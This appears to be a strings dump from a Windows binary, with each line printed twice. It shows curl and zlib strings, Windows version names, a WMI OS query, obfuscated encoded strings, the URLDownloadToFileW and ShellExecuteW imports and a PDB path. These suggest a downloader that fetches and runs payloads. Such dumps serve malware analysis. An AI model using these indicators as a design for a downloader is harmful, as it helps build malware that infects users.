%s/%s
%s/%s
%s xxxxxxxxxxxxxxxx
%s xxxxxxxxxxxxxxxx
00000001
00000001
xxxx
xxxx
username="%s",realm="%s",nonce="%s",cnonce="%s",nc="%s",digest-uri="%s",response=%s,qop=%s
username="%s",realm="%s",nonce="%s",cnonce="%s",nc="%s",digest-uri="%s",response=%s,qop=%s
%s:%s:%s
%s:%s:%s
%s:%s:x:%s:%s:%s
%s:%s:x:%s:%s:%s
username="%s", realm="%s", nonce="%s", uri="%s", cnonce="%s", nc=x, qop=%s, response="%s"
username="%s", realm="%s", nonce="%s", uri="%s", cnonce="%s", nc=x, qop=%s, response="%s"
username="%s", realm="%s", nonce="%s", uri="%s", response="%s"
username="%s", realm="%s", nonce="%s", uri="%s", response="%s"
%s, opaque="%s"
%s, opaque="%s"
%s, algorithm="%s"
%s, algorithm="%s"
user=%s
user=%s
auth=Bearer %s
auth=Bearer %s
Unsupported SASL authentication mechanism
Unsupported SASL authentication mechanism
0123456789-
0123456789-
NTLMSSP%c
NTLMSSP%c
%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%s%s
%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%s%s
%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c
%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c
1.2.8
1.2.8
deflate 1.2.8 Copyright 1995-2013 Jean-loup Gailly and Mark Adler
deflate 1.2.8 Copyright 1995-2013 Jean-loup Gailly and Mark Adler
inflate 1.2.8 Copyright 1995-2013 Mark Adler
inflate 1.2.8 Copyright 1995-2013 Mark Adler
function not supported
function not supported
operation canceled
operation canceled
address_family_not_supported
address_family_not_supported
operation_in_progress
operation_in_progress
operation_not_supported
operation_not_supported
protocol_not_supported
protocol_not_supported
operation_would_block
operation_would_block
address family not supported
address family not supported
broken pipe
broken pipe
inappropriate io control operation
inappropriate io control operation
not supported
not supported
operation in progress
operation in progress
operation not permitted
operation not permitted
operation not supported
operation not supported
operation would block
operation would block
protocol not supported
protocol not supported
Visual C CRT: Not enough memory to complete call to strerror.
Visual C CRT: Not enough memory to complete call to strerror.
Operation not permitted
Operation not permitted
Inappropriate I/O control operation
Inappropriate I/O control operation
Broken pipe
Broken pipe
operator
operator
GetProcessWindowStation
GetProcessWindowStation
curl_global_init failed: %d
curl_global_init failed: %d
Microsoft Windows NT 4.0
Microsoft Windows NT 4.0
Microsoft Windows 95
Microsoft Windows 95
Microsoft Windows 98
Microsoft Windows 98
Microsoft Windows Me
Microsoft Windows Me
Microsoft Windows 2000
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows XP
Microsoft Windows XP Professional x64 Edition
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Compute Cluster Edition
Microsoft Windows Server 2003 Compute Cluster Edition
Microsoft Windows Server 2003 Storage Server
Microsoft Windows Server 2003 Storage Server
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 R2 Storage Server
Microsoft Windows Server 2003 R2 Storage Server
Microsoft Windows Vista
Microsoft Windows Vista
Microsoft Windows Server 2008
Microsoft Windows Server 2008
Microsoft Windows 7
Microsoft Windows 7
Microsoft Windows Server 2008 R2
Microsoft Windows Server 2008 R2
EEDTFJDVCLHQJLBOJLDUCLFDJIDVIWCWDUDPCHERBBHHHYDTIPGSFTFVGKCTAYDQIWAFHHERFPGKAYENGPEKHBHICG
EEDTFJDVCLHQJLBOJLDUCLFDJIDVIWCWDUDPCHERBBHHHYDTIPGSFTFVGKCTAYDQIWAFHHERFPGKAYENGPEKHBHICG
EEDTFJDVCLHQJLCHDMGWJUGGEEGNGQFNGYFBFKCNFLITFTBKBMDRIJGYFYIJAUHNIJEBATDIJJIBBECXHOGPJTEKHXJJJOIYJHGJIPBQBOHLFSDNEXEYIRADGREOBVAX
EEDTFJDVCLHQJLCHDMGWJUGGEEGNGQFNGYFBFKCNFLITFTBKBMDRIJGYFYIJAUHNIJEBATDIJJIBBECXHOGPJTEKHXJJJOIYJHGJIPBQBOHLFSDNEXEYIRADGREOBVAX
EEDTFJDVCLHQJLCBBIIFHBAEGYDJJIHOGOCVIREVDXJRDHDDCGGSDLDRGQBGHOCIGKBJASICIVGWEBFRHIBGCCCNHSCGAF
EEDTFJDVCLHQJLCBBIIFHBAEGYDJJIHOGOCVIREVDXJRDHDDCGGSDLDRGQBGHOCIGKBJASICIVGWEBFRHIBGCCCNHSCGAF
EEDTFJDVCLHQJLCHDMGXGUJLCWACAAFYBDJGEICOFTIAHMJGJKGJCVFNIUJGGHAWAIEZBCCOFEAOATEWJHDFAUCTBXIMFODUIXHKDODHIGBLHFGCERIOJUEUDPFEEGHK
EEDTFJDVCLHQJLCHDMGXGUJLCWACAAFYBDJGEICOFTIAHMJGJKGJCVFNIUJGGHAWAIEZBCCOFEAOATEWJHDFAUCTBXIMFODUIXHKDODHIGBLHFGCERIOJUEUDPFEEGHK
SELECT * FROM Win32_OperatingSystem
SELECT * FROM Win32_OperatingSystem
InternetOpenUrlW
InternetOpenUrlW
HttpQueryInfoW
HttpQueryInfoW
HttpOpenRequestW
HttpOpenRequestW
HttpSendRequestW
HttpSendRequestW
URLDownloadToFileW
URLDownloadToFileW
ShellExecuteW
ShellExecuteW
C:\Users\Administrator\Desktop\Q
C:\Users\Administrator\Desktop\Q
\Release\nmjh.pdb
\Release\nmjh.pdb
WLDAP32.dll
WLDAP32.dll
WS2_32.dll
WS2_32.dll
PeekNamedPipe
PeekNamedPipe
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegOpenKeyExW
RegOpenKeyExW
RegEnumKeyExW
RegEnumKeyExW
RegCloseKey
RegCloseKey
CryptDestroyKey
CryptDestroyKey
CryptImportKey
CryptImportKey
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
IPHLPAPI.DLL
IPHLPAPI.DLL
GetCPInfo
GetCPInfo
GetProcessHeap
GetProcessHeap
zcÃ
zcÃ
$